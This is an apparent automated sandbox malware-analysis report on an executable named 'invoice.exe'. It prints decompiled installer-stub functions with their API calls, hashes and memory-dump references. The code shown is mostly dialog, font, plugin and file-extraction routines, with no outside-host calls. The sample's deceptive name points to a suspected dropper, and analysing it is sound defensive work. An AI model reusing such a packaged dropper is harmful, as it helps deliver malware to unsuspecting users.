                                            • "C:\Users\user\Desktop\invoice.exe", xrefs: 0040620B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\invoice.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-77870969
                                            • Opcode ID: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
                                            • Instruction ID: ed3a47555f86895cac8e455d85beb05a749fa7fcd8deb799c497f9efd275ca90
                                            • Opcode Fuzzy Hash: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
                                            • Instruction Fuzzy Hash: D111E26180579029FB3226380C44B776F884F6A760F1900BFE8D2722C3CA7C5C62966E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402C61(struct HWND__* _a4, intOrPtr _a8) {
                                            				char _v68;
                                            				int _t11;
                                            				int _t20;
                                            
                                            				if(_a8 == 0x110) {
                                            					SetTimer(_a4, "true", 0xfa, 0);
                                            					_a8 = 0x113;
                                            				}
                                            				if(_a8 == 0x113) {
                                            					_t20 =  *0x415420; // 0xd02b5
                                            					_t11 =  *0x42142c; // 0xd24e8
                                            					if(_t20 >= _t11) {
                                            						_t20 = _t11;
                                            					}
                                            					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                            					SetWindowTextA(_a4,  &_v68);
                                            					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                            				}
                                            				return 0;
                                            			}






                                            APIs
                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C7C
                                            • MulDiv.KERNEL32(000D02B5,00000064,000D24E8), ref: 00402CA7
                                            • wsprintfA.USER32 ref: 00402CB7
                                            • SetWindowTextA.USER32(?,?), ref: 00402CC7
                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%$$
                                            • API String ID: 1451636040-2655702876
                                            • Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                            • Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
                                            • Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                            • Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040408D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                            				struct tagLOGBRUSH _v16;
                                            				long _t35;
                                            				long _t37;
                                            				void* _t40;
                                            				long* _t49;
                                            
                                            				if(_a4 + 0xfffffecd > 5) {
                                            					L15:
                                            					return 0;
                                            				}
                                            				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                            				if(_t49 == 0) {
                                            					goto L15;
                                            				}
                                            				_t35 =  *_t49;
                                            				if((_t49[5] & 0x00000002) != 0) {
                                            					_t35 = GetSysColor(_t35);
                                            				}
                                            				if((_t49[5] & 0x00000001) != 0) {
                                            					SetTextColor(_a8, _t35);
                                            				}
                                            				SetBkMode(_a8, _t49[4]);
                                            				_t37 = _t49[1];
                                            				_v16.lbColor = _t37;
                                            				if((_t49[5] & 0x00000008) != 0) {
                                            					_t37 = GetSysColor(_t37);
                                            					_v16.lbColor = _t37;
                                            				}
                                            				if((_t49[5] & 0x00000004) != 0) {
                                            					SetBkColor(_a8, _t37);
                                            				}
                                            				if((_t49[5] & 0x00000010) != 0) {
                                            					_v16.lbStyle = _t49[2];
                                            					_t40 = _t49[3];
                                            					if(_t40 != 0) {
                                            						DeleteObject(_t40);
                                            					}
                                            					_t49[3] = CreateBrushIndirect( &_v16);
                                            				}
                                            				return _t49[3];
                                            			}








                                            APIs
                                            • GetWindowLongA.USER32(?,000000EB), ref: 004040AA
                                            • GetSysColor.USER32(00000000), ref: 004040C6
                                            • SetTextColor.GDI32(?,00000000), ref: 004040D2
                                            • SetBkMode.GDI32(?,?), ref: 004040DE
                                            • GetSysColor.USER32(?), ref: 004040F1
                                            • SetBkColor.GDI32(?,?), ref: 00404101
                                            • DeleteObject.GDI32(?), ref: 0040411B
                                            • CreateBrushIndirect.GDI32(?), ref: 00404125
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                            • Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
                                            • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                            • Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E100023D8(intOrPtr* _a4) {
                                            				char _v80;
                                            				intOrPtr _v84;
                                            				short _v92;
                                            				intOrPtr* _t22;
                                            				void* _t24;
                                            				intOrPtr _t25;
                                            				signed int _t33;
                                            				void* _t37;
                                            				intOrPtr _t38;
                                            				void* _t41;
                                            
                                            				_t37 = E10001215();
                                            				_t22 = _a4;
                                            				_t38 =  *((intOrPtr*)(_t22 + 0x814));
                                            				_v84 = _t38;
                                            				_t41 = (_t38 + 0x41 << 5) + _t22;
                                            				do {
                                            					if( *((intOrPtr*)(_t41 - 4)) != 0xffffffff) {
                                            					}
                                            					_t33 =  *(_t41 - 8);
                                            					if(_t33 <= 7) {
                                            						switch( *((intOrPtr*)(_t33 * 4 +  &M100024FB))) {
                                            							case 0:
                                            								 *_t37 = 0;
                                            								goto L15;
                                            							case 1:
                                            								_push( *__eax);
                                            								goto L13;
                                            							case 2:
                                            								__eax = E10001429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                            								goto L14;
                                            							case 3:
                                            								__eax = lstrcpynA(__edi,  *__eax,  *0x1000405c);
                                            								goto L15;
                                            							case 4:
                                            								__ecx =  *0x1000405c;
                                            								__edx = __ecx - 1;
                                            								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                            								__eax =  *0x1000405c;
                                            								 *((char*)(__eax + __edi - 1)) = __bl;
                                            								goto L15;
                                            							case 5:
                                            								__ecx =  &_v80;
                                            								_push(0x27);
                                            								_push( &_v80);
                                            								_push( *__eax);
                                            								__imp__StringFromGUID2();
                                            								__eax =  &_v92;
                                            								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x1000405c, __ebx, __ebx);
                                            								goto L15;
                                            							case 6:
                                            								_push( *__esi);
                                            								L13:
                                            								__eax = wsprintfA(__edi, 0x10004000);
                                            								L14:
                                            								__esp = __esp + 0xc;
                                            								goto L15;
                                            						}
                                            					}
                                            					L15:
                                            					_t24 =  *(_t41 + 0x14);
                                            					if(_t24 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t41 - 4)) > 0)) {
                                            						GlobalFree(_t24);
                                            					}
                                            					_t25 =  *((intOrPtr*)(_t41 + 0xc));
                                            					if(_t25 != 0) {
                                            						if(_t25 != 0xffffffff) {
                                            							if(_t25 > 0) {
                                            								E100012D1(_t25 - 1, _t37);
                                            								goto L24;
                                            							}
                                            						} else {
                                            							E10001266(_t37);
                                            							L24:
                                            						}
                                            					}
                                            					_v84 = _v84 - 1;
                                            					_t41 = _t41 - 0x20;
                                            				} while (_v84 >= 0);
                                            				return GlobalFree(_t37);
                                            			}













                                            APIs
                                              • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                            • GlobalFree.KERNEL32(?), ref: 100024B3
                                            • GlobalFree.KERNEL32(00000000), ref: 100024ED
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_10000000_invoice.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                                            • Instruction ID: c0db1d51d0d8beb2da32add46ec64f24e8f484468aa98c5ce89375ba0c102a5a
                                            • Opcode Fuzzy Hash: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                                            • Instruction Fuzzy Hash: 0831A9B1504211EFF322DB94CCC4C2B7BBDEB853D4B118929FA4193228CB31AC94DB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404957(struct HWND__* _a4, intOrPtr _a8) {
                                            				long _v8;
                                            				signed char _v12;
                                            				unsigned int _v16;
                                            				void* _v20;
                                            				intOrPtr _v24;
                                            				long _v56;
                                            				void* _v60;
                                            				long _t15;
                                            				unsigned int _t19;
                                            				signed int _t25;
                                            				struct HWND__* _t28;
                                            
                                            				_t28 = _a4;
                                            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                            				if(_a8 == 0) {
                                            					L4:
                                            					_v56 = _t15;
                                            					_v60 = 4;
                                            					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                            					return _v24;
                                            				}
                                            				_t19 = GetMessagePos();
                                            				_v16 = _t19 >> 0x10;
                                            				_v20 = _t19;
                                            				ScreenToClient(_t28,  &_v20);
                                            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                            				if((_v12 & 0x00000066) != 0) {
                                            					_t15 = _v8;
                                            					goto L4;
                                            				}
                                            				return _t25 | 0xffffffff;
                                            			}














                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
                                            • GetMessagePos.USER32 ref: 0040497A
                                            • ScreenToClient.USER32(?,?), ref: 00404994
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                            • Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
                                            • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                            • Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E00401D95(intOrPtr __edx) {
                                            				void* __esi;
                                            				int _t9;
                                            				signed char _t15;
                                            				struct HFONT__* _t18;
                                            				intOrPtr _t30;
                                            				struct HDC__* _t31;
                                            				void* _t33;
                                            				void* _t35;
                                            
                                            				_t30 = __edx;
                                            				_t31 = GetDC( *(_t35 - 8));
                                            				_t9 = E00402A9F(2);
                                            				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
                                            				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                            				ReleaseDC( *(_t35 - 8), _t31);
                                            				 *0x40b830 = E00402A9F(3);
                                            				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                            				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
                                            				 *0x40b837 = 1;
                                            				 *0x40b834 = _t15 & 0x00000001;
                                            				 *0x40b835 = _t15 & 0x00000002;
                                            				 *0x40b836 = _t15 & 0x00000004;
                                            				E00405F87(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
                                            				_t18 = CreateFontIndirectA(0x40b820);
                                            				_push(_t18);
                                            				_push(_t33);
                                            				E00405EC3();
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
                                            				return 0;
                                            			}












                                            APIs
                                            • GetDC.USER32(?), ref: 00401D98
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                            • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                            • CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Times New Roman
                                            • API String ID: 3808545654-927190056
                                            • Opcode ID: 8d956707ffe88138eff2d14c933710156e05edfb94d5aae4ab48e4845a293012
                                            • Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
                                            • Opcode Fuzzy Hash: 8d956707ffe88138eff2d14c933710156e05edfb94d5aae4ab48e4845a293012
                                            • Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E100021FA(void* __edx, intOrPtr _a4) {
                                            				signed int _v4;
                                            				void* _t36;
                                            				signed int _t37;
                                            				void* _t38;
                                            				void* _t41;
                                            				void* _t46;
                                            				signed int* _t48;
                                            				signed int* _t49;
                                            
                                            				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                            				while(1) {
                                            					_t9 = _a4 + 0x818; // 0x818
                                            					_t49 = (_v4 << 5) + _t9;
                                            					_t36 = _t49[6];
                                            					if(_t36 == 0) {
                                            						goto L9;
                                            					}
                                            					_t46 = 0x1a;
                                            					if(_t36 == _t46) {
                                            						goto L9;
                                            					}
                                            					if(_t36 != 0xffffffff) {
                                            						if(_t36 <= 0 || _t36 > 0x19) {
                                            							_t49[6] = _t46;
                                            						} else {
                                            							_t36 = E100012AD(_t36 - 1);
                                            							L10:
                                            						}
                                            						goto L11;
                                            					} else {
                                            						_t36 = E1000123B();
                                            						L11:
                                            						_t41 = _t36;
                                            						_t13 =  &(_t49[2]); // 0x820
                                            						_t48 = _t13;
                                            						if(_t49[1] != 0xffffffff) {
                                            						}
                                            						_t37 =  *_t49;
                                            						_t49[7] = _t49[7] & 0x00000000;
                                            						if(_t37 > 7) {
                                            							L27:
                                            							_t38 = GlobalFree(_t41);
                                            							if(_v4 == 0) {
                                            								return _t38;
                                            							}
                                            							if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                            								_v4 = _v4 + 1;
                                            							} else {
                                            								_v4 = _v4 & 0x00000000;
                                            							}
                                            							continue;
                                            						} else {
                                            							switch( *((intOrPtr*)(_t37 * 4 +  &M1000237E))) {
                                            								case 0:
                                            									 *_t48 =  *_t48 & 0x00000000;
                                            									goto L27;
                                            								case 1:
                                            									__eax = E100012FE(__ebx);
                                            									goto L20;
                                            								case 2:
                                            									 *__ebp = E100012FE(__ebx);
                                            									_a4 = __edx;
                                            									goto L27;
                                            								case 3:
                                            									__eax = E10001224(__ebx);
                                            									 *(__esi + 0x1c) = __eax;
                                            									L20:
                                            									 *__ebp = __eax;
                                            									goto L27;
                                            								case 4:
                                            									 *0x1000405c =  *0x1000405c +  *0x1000405c;
                                            									__edi = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
                                            									 *0x1000405c = MultiByteToWideChar(0, 0, __ebx,  *0x1000405c, __edi,  *0x1000405c);
                                            									if( *__esi != 5) {
                                            										 *(__esi + 0x1c) = __edi;
                                            										 *__ebp = __edi;
                                            									} else {
                                            										__eax = GlobalAlloc(0x40, 0x10);
                                            										_push(__eax);
                                            										 *(__esi + 0x1c) = __eax;
                                            										_push(__edi);
                                            										 *__ebp = __eax;
                                            										__imp__CLSIDFromString();
                                            										__eax = GlobalFree(__edi);
                                            									}
                                            									goto L27;
                                            								case 5:
                                            									if( *__ebx != 0) {
                                            										__eax = E100012FE(__ebx);
                                            										 *__edi = __eax;
                                            									}
                                            									goto L27;
                                            								case 6:
                                            									__esi =  *(__esi + 0x18);
                                            									__esi = __esi - 1;
                                            									__esi = __esi *  *0x1000405c;
                                            									__esi = __esi +  *0x10004064;
                                            									__eax = __esi + 0xc;
                                            									 *__edi = __esi + 0xc;
                                            									asm("cdq");
                                            									__eax = E10001429(__edx, __esi + 0xc, __edx, __esi);
                                            									goto L27;
                                            							}
                                            						}
                                            					}
                                            					L9:
                                            					_t36 = E10001224(0x10004034);
                                            					goto L10;
                                            				}
                                            			}












                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 10002348
                                              • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C5
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022DA
                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E9
                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F7
                                            • GlobalFree.KERNEL32(00000000), ref: 100022FE
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_10000000_invoice.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                            • String ID:
                                            • API String ID: 3730416702-0
                                            • Opcode ID: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                                            • Instruction ID: a642113aa4013a2ca06c871554e8d399cf46bf4099943ddf9e0960cc50565d32
                                            • Opcode Fuzzy Hash: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                                            • Instruction Fuzzy Hash: A941BCB1508311EFF320DF648C84B6AB7E8FF443D0F11892AF946D61A9DB34AA40CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E00402736(int __ebx) {
                                            				void* _t26;
                                            				long _t31;
                                            				int _t45;
                                            				void* _t49;
                                            				void* _t51;
                                            				void* _t54;
                                            				void* _t55;
                                            				void* _t56;
                                            
                                            				_t45 = __ebx;
                                            				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                            				_t50 = E00402AC1(0xfffffff0);
                                            				 *(_t56 - 0x34) = _t23;
                                            				if(E0040596A(_t50) == 0) {
                                            					E00402AC1(0xffffffed);
                                            				}
                                            				E00405AD9(_t50);
                                            				_t26 = E00405AFE(_t50, 0x40000000, 2);
                                            				 *(_t56 + 8) = _t26;
                                            				if(_t26 != 0xffffffff) {
                                            					_t31 =  *0x42f418;
                                            					 *(_t56 - 0x30) = _t31;
                                            					_t49 = GlobalAlloc(0x40, _t31);
                                            					if(_t49 != _t45) {
                                            						E004031A9(_t45);
                                            						E00403193(_t49,  *(_t56 - 0x30));
                                            						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                            						 *(_t56 - 0x3c) = _t54;
                                            						if(_t54 != _t45) {
                                            							E00402F81( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                            							while( *_t54 != _t45) {
                                            								_t47 =  *_t54;
                                            								_t55 = _t54 + 8;
                                            								 *(_t56 - 0x84) =  *_t54;
                                            								E00405AB9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                            								_t54 = _t55 +  *(_t56 - 0x84);
                                            							}
                                            							GlobalFree( *(_t56 - 0x3c));
                                            						}
                                            						E00405BA5( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                            						GlobalFree(_t49);
                                            						 *((intOrPtr*)(_t56 - 0xc)) = E00402F81(0xffffffff,  *(_t56 + 8), _t45, _t45);
                                            					}
                                            					CloseHandle( *(_t56 + 8));
                                            				}
                                            				_t51 = 0xfffffff3;
                                            				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                            					_t51 = 0xffffffef;
                                            					DeleteFileA( *(_t56 - 0x34));
                                            					 *((intOrPtr*)(_t56 - 4)) = 1;
                                            				}
                                            				_push(_t51);
                                            				E00401423();
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t56 - 4));
                                            				return 0;
                                            			}












                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                            • GlobalFree.KERNEL32(?), ref: 004027E5
                                            • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                                            • Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
                                            • Opcode Fuzzy Hash: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                                            • Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E0040484D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                            				char _v36;
                                            				char _v68;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t21;
                                            				signed int _t22;
                                            				void* _t29;
                                            				void* _t31;
